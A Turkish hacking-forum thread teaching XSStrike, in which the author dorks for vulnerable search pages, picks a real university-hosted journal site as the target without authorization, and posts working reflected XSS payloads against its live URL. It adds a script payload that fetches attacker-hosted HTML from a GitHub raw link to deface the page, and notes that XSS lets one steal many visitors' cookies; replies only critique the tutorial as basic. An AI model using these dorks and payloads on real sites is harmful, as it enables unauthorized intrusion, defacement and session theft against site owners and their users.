XSStrike Nedir, Nasıl Kullanılır?

Agent-47

Katılımcı Üye
23 Mar 2023
415
266
HACKERİSTAN
Herkese selam dostlar bugün bu konumuzda XSStrike toolunu anlatacağım. Şimdiden okuduğunuz için teşekkürler.

xsstrike-768x422.jpg.webp

İlk önce Toolumuzun kurulumuna geçelim

kali linuxümü açtım. ve /opt klasöründe terminale bu kodu girdim.

1.png

kod:

Kod:
git clone https://github.com/s0md3v/XSStrike.git;cd XSStrike;python3 xsstrike.py
Kod:

# bunu yazdıktan sonra
python3 xsstrike.py yazabilirsiniz.

evet şimdi toolumuzu hazırladığımıza göre
xss dork yazalım.

benim kullanacağım
dork:

Kod:
inurl:php?search= site:dk

Screenshot-29.png

Acta Chemica Scandinavica sitesi hedefimiz olsun.

dorkun bu sitede bulduğu
link:

Screenshot-32.png

sitede
search yapacağımız inputlar var (genelde searchler reflected xss olur) hemen xss deneyelim
klasik xss payloadı:

JavaScript:
<script>alert(1)</script>

2.png

sonuç:

3.png

(
xss açığı var)

şimdi sitede search yaptıktan sonra bize
verdiği linkteki yazdığımız payloadı sildikten sonra linki xsstrike'a yönlendirelim. Bu link işinde dikkatli olun doğru linki verdiğinizden emin olun
burayı:

4.png

şimdi
sıra XSStrike'ta

indir.png
XSStrike ta sitede xss payloadları denemesi için kısaca şu kodu yazabilirsiniz :)

Kod:
python3 -u "http://actachemscand.ki.ku.dk/results.php?keywords="

5.png

ve
taramayı başlatalım.

6.png

şimdi bir
payloadı seçelim

7.png

bunu linkteki
keywords= parametresinin yanına yazalım.
yani buraya:

Kod:
http://actachemscand.ki.ku.dk/results.php?keywords=<details%0aontoggLE%09=%09a=prompt,a()%0dx//

8.png

evet arkadaşlar
bu payload siteye ayrıntılar diye bi kutucuk ekliyor bu kutucuğu açınca alert geliyor.

9.png

xsstriketa
başka parametreler de var --fuzzer, --crawl gibi isterseniz bunlarıda kullanabilirsiniz.
xss açıklı siteye birçok şey yapabilirsiniz özellikle büyük bir siteyse
xss sayesinde birçok kişinin cookiesini çalabilirsiniz.
isterseniz biz xss ile index deneyelim. Ama sitedeki xss zafiyeti reflected türü olduğu için sadece linki kullanan kişilerde görünecektir indexiniz.
neyse
siteye bu payloadı yazıyorsunuz

JavaScript:
<script>fetch("https://raw.githubusercontent.com/profiliniz/repositoryniz/main/dosyanız").then(response => response.text()).then(html => document.body.innerHTML = html);</script>

ama bundan önce githubda bir
repository oluşturun ve bunun içine bir dosya oluşturup içine indexinizin kodlarını yazın ardından raw linkini alın ve https://raw.githubusercontent.com'a raw linkinizi yapıştırın

10.png

ardından
enterleyin

11.png

ve
index yüklendi :)

eğer
stored xss te bunu yaparsanız indexiniz sitede ana sayfa gibi yerlerde görünür. yada zafiyetin bulunduğu sayfada görünür yani linkte görünmez. :)

konumu okuduğunuz için
teşekkür ederim :)

Son düzenleme:

Agent-47

Katılımcı Üye
23 Mar 2023
415
266
HACKERİSTAN
Ellerine sağlık.
teşekkürler
Eline sağlık agent bunun arka planda nasıl işlediğini de anlatsaydın daha güzel olurdu
nasıl yani anlamadım hocam, xsstrike'ın nasıl çalıştığımı, onu diyosanız zaten bu tool payloadları brute force yapıp kontrol ederek çalışmıyor mu
eline koluna sağlık
teşekkürler
eline sağlık güzel konu
teşekkürler :)
Emeklerine sağlık , detaylı ve anlaşılır bir konu olmuş 👍🏻🙂
teşekkür ederim :)
(karalama) bakmayın
hee :D bakmadın demi oraya :D

7 Ağu 2023
99
55
konu çok basit ve temel seviyenin bile altında geliştirmenizi öneririm
şayet xss temelinde client side bi açık kullanıcı odaklı saldırılar genelde yapılır
attığın index sadece senin browserında çalışır html yönlendirmesi ile bu şekilde servera müdahale edemezsin manuel tespit etmek önceliğiniz olsun bu gibi basit payload ibaresinden olan toolar değil
xssstrike kullanmadan önce
derinlemesine xss ve javascript nedir öğrenmenizi tavsiye ediyorum
ayrıca xss konusunda lab ve ctf çözmenizi tavsiye ederim dork ile bir şeyler denemekten çok daha faydası dokunur
iyi günler dilerim.

Agent-47

Katılımcı Üye
23 Mar 2023
415
266
HACKERİSTAN
konu çok basit ve temel seviyenin bile altında geliştirmenizi öneririm
şayet xss temelinde client side bi açık kullanıcı odaklı saldırılar genelde yapılır
attığın index sadece senin browserında çalışır html yönlendirmesi ile bu şekilde servera müdahale edemezsin manuel tespit etmek önceliğiniz olsun bu gibi basit payload ibaresinden olan toolar değil
xssstrike kullanmadan önce
derinlemesine xss ve javascript nedir öğrenmenizi tavsiye ediyorum
ayrıca xss konusunda lab ve ctf çözmenizi tavsiye ederim dork ile bir şeyler denemekten çok daha faydası dokunur
iyi günler dilerim.
Konuyu paylaşmam gerekiyordu en kısa sürede, xsstrike'ın diğer özelliklerinin kullanımını bulamadım bu şekilde paylaştım
xss açığını biliyorum ama ileri düzey değilim attığım İndexin sadece linkte görüneceğini, stored türde inputu verdiğimiz yerde görüneceğini belirtmiştim:
eğer stored xss te bunu yaparsanız indexiniz sitede ana sayfa gibi yerlerde görünür. yada zafiyetin bulunduğu sayfada görünür yani linkte görünmez
Stored açıkta tabiki indeximi basabilirim ve birçok deneyimim var
Dediğim üzere bu toolu ilk kez araştırdım detaylı araştırmak için zamanım yetmicekti ve açıkçası bu tür otomatik toolları pek kullanmam :D
Xss açığınıda aramıyorum önceliğim değil tabiki hedef site de tararım ama dediğim gibi hedef site bulmak için xss dork yazmam sırf konu içindi
Xss güzel bir açık ilerde detaylı, ileri düzey bi şekilde öğrenirim javascriptte öğreneceğim diller arasında yer alıyor zaten
Lab ve ctf pek çözmüyorum ama tavsiyen için teşekkürler
Eline sağlık Agent : )
Teşekkür ederim hocam :)

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.